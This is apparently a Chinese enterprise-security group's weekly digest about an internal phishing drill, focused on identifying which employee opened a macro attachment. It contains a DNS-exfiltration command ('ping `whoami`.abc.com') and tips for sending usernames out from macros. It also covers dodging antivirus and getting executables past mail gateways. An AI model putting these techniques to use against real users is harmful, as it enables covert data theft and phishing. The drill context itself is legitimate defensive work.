钓鱼邮件如何确定office附件宏的打开者身份?| 总第241周
0x1本周话题
话题:钓鱼邮件演练,office附件宏怎么确定是哪个人打开的?我用的gophish。
A1:在宏里面加获取计算机信息的内容,宏里面带标识。
Q:那批量发送,每个宏都不一样吗?
A2:起个dnslog,把访问标识通过带进去就访问,一样的宏就行,比如运行命令ping `whoami`.abc.com,你在dnslog那边就能看到了。
Q:这个好像可以有,我们单位统一发的计算机,主机名都一样怎么办?
A3:如果是域内的话,肯定是用户名啊,用户名总不可能是一样的吧,再就是访问ip也可以判断,内网ip跟人做了绑定查一下就是了。叫你们的运维在域控下发策略修改,你不提需求,别人怎么知道你有需求。
A4:我也遇到过一些特殊场景,就是有的电脑没入域,没安装桌管,没安装dlp,没安装杀软,共用电脑。直接分享经验:如果有办法在目标电脑执行命令,就可以获取当前域用户名、foxmail用户目录、桌管日志、dlp配置、杀软配置、内网聊天工具配置、c:/users目录最新5个文件夹等,以上点正则就能提取出用户身份,重复出现两个以上的就是当前用户。纯cmd命令。
Q:那得安装agent吧。还有,如果是手机打开的怎么办呢?
A5:每个人都发内容一样,但链接不一样的邮件。或者宏里面调用一个HTTP请求访问,把主机名和用户名传过去,这样在Web服务器的Log就能看到了。
A6:http://公司/?token=一串每个人都唯一的加密值。这样能防爆破,防伪造,还能精准确认人员,邮件支持图片引用外链的,图片链接也可以用这种,这样能统计钓鱼邮件阅读数。
Q:主机名怎么可能都一样?同一网络内不能使用同一主机名。这是基操。
A7:我们好像发过来都是一样的。买的就是一样的 我们又没用域。
Q:这不是域的问题,你们主机难道不进行改名操作?这是啥情况。都是同一主机名的情况下,很难想象资产报告如何做。
A8:要域管才涉及到主机名吧。钓鱼邮件配合CanaryToken已经可以够了
A9:电脑还行,我们大多数人是手机接收的邮件。
A10:你这个钓鱼场景没想清楚,你要先固定好你的钓鱼场景和利用的方式才能搞,手机打开宏又没用,没有潜在的利用场景,所以就算手机打开又能怎么样。
A11:用ghost之类做的系统主机名就会一样吧,钓鱼场景下想区分用powershell调outlook相关的API应该能读出来用户名。
A12:ghost主机名是一样,但是加域的时候,写个脚本,把机器名改一下就好了,写个自动化加域的批处理,加域的时候自动执行改名操作。可以取登录用户名,也可以取网阿卡mac地址之类的,加域了应该不用写脚本了,域控会自动改的。
A13:主机名一改怕是应用和数据库集群会有问题。
A14:加域的时候改名字。
Q:GHOST不做OOBE,不改SID出来的系统能用吗?做了OOBE,主机名还会是一致的吗?
A15:IT那边做系统的时候是用的一键还原和一备份的模式,有点类似ghost,就是同型号的PC LAPTOP找个机器出来,做模板,然后就是PE下的一键备份工具直接全盘备份下来,然后后面同类型的机器直接一键还原。
A16:不管是哪种备份还原手段,只要是批量使用必须OOBE,不做OOBE,不改SID的系统内的运维直接开了算了。
A17:用dnslog把ip传过去是可行的,搞过。一种场景不能覆盖全部的,今年用表单填写,可以明年用exe,就是exe或者宏不做免杀会老被杀软干掉,登公司杀软后台直接加白样本。还要注意AC需要提前加白。自己从0搭,还是挺费劲的。
A18:不需要免杀的,你exe本身不做特定攻击行为,也就拉起一个HTTP请求就好了。此外,就算是被拦截了,杀软服务器端也可以看到哪些人执行了该程序,那么这也达成了统计目标。简单用py打包成exe,或者没有签名,十有八九是会被杀的,包括宏里vb获取信息去http get,行为也会被拦,倒是把信息放在域名请求里不大会被拦,试过360杀毒,如果是网络版统管放行另说了。
A19:宏搞完了,用ping访问hostname,dnslog记录不会被杀。你可以试试用vb去发起http,360杀毒会拦截的。
A20:我们测试的目的不是为了免杀。是为了统计。杀了有记录不就行了。
A21:钓鱼也得适用万一没统管杀毒的场景,如果杀软不能统一加白的话,那这种钓鱼的成本太高了,需要专项处理。
A22:经验就是如果想尽量精确,能够追踪,那么gophish还不太行
A23:我记得这个平台的rid并不绑定收件人,如果捣乱乱填,结果失真。我们还有另外一个搞笑的。用户A收到后,自己没点,把邮件转发给了他们小组,结果小组成员B点了。但是因为是用户A的RID,所以,统计结果算用户A的。
A24:嗯,不管哪种方式得把收件人信息写入投递的特征里用来追踪,这块只能自己想办法,收件人要跟用户填的东西或者收集的东西比对,尽量排除失真的数据。每家企业情况都不一样,适用方法也需要执行调整,大多数情况下,已经足够适用了。
Q:测试钓鱼邮件的时候,只要碰到exe附件就直接干掉怎么处理?我试过压缩、加密压缩,都给我干掉了。
A25:放到iso镜像里面,或者给个链接去下载,后端校验UA或者ip不能来自邮件网关。
Q:加密压缩,加密文件名也能识别到exe吗?
A26:自家公司可以白名单,在发邮件前一秒取消病毒文件拦截配置,发送,成功后即可恢复安全配置。意思是用甲方的方式可以实现,不用追求黑客的攻击方式,自家测试用poc,商业实战用exp。
A27:虽然不知道你的具体配置情况,但如果如你所述,邮件网关已经自动判定所有携带加密附件为恶意邮件,那么可以在EXE附件,EXE加密附件,EXE强加密附件测试这三项打勾勾了。可以直接忽略这个测试项,做下一个了。zip, 7zip, rar等其他压缩格式也都需要一一确认。
A28:直接excel宏不会被拦,但是默认宏不打开,估计效果不行。EXCEl宏是通过引导机制触发的。一直启用宏开关的估计稀少,如果宏用的不多,直接注册表关闭所有宏调用就一劳永逸了。
0x2 群友分享
【安全资讯】
Microsoft Copilot for Security携全新强大功能将于4月1日全球正式发布!
----------------------------------------------------------------------------
【金融业企业安全建设实践群】和【企业安全建设实践群】每周讨论的精华话题会同步在本公众号推送(每周)。根据话题整理的群周报完整版——每个话题甲方朋友们的****展开讨论内容——每周会上传知识星球,方便大家查阅。
往期群周报:
关于数据库加解密平台讨论及如何保证临时token的安全性?| 总第240周
关于SOC关联分析暨从VPN问题看安全管理的策略与权衡的讨论 | 总第239周
如何在国密算法加密情况下保证安全防护及检测的有效性?| 总第238周
如何进群?
如何下载群周报完整版?
请见下图:
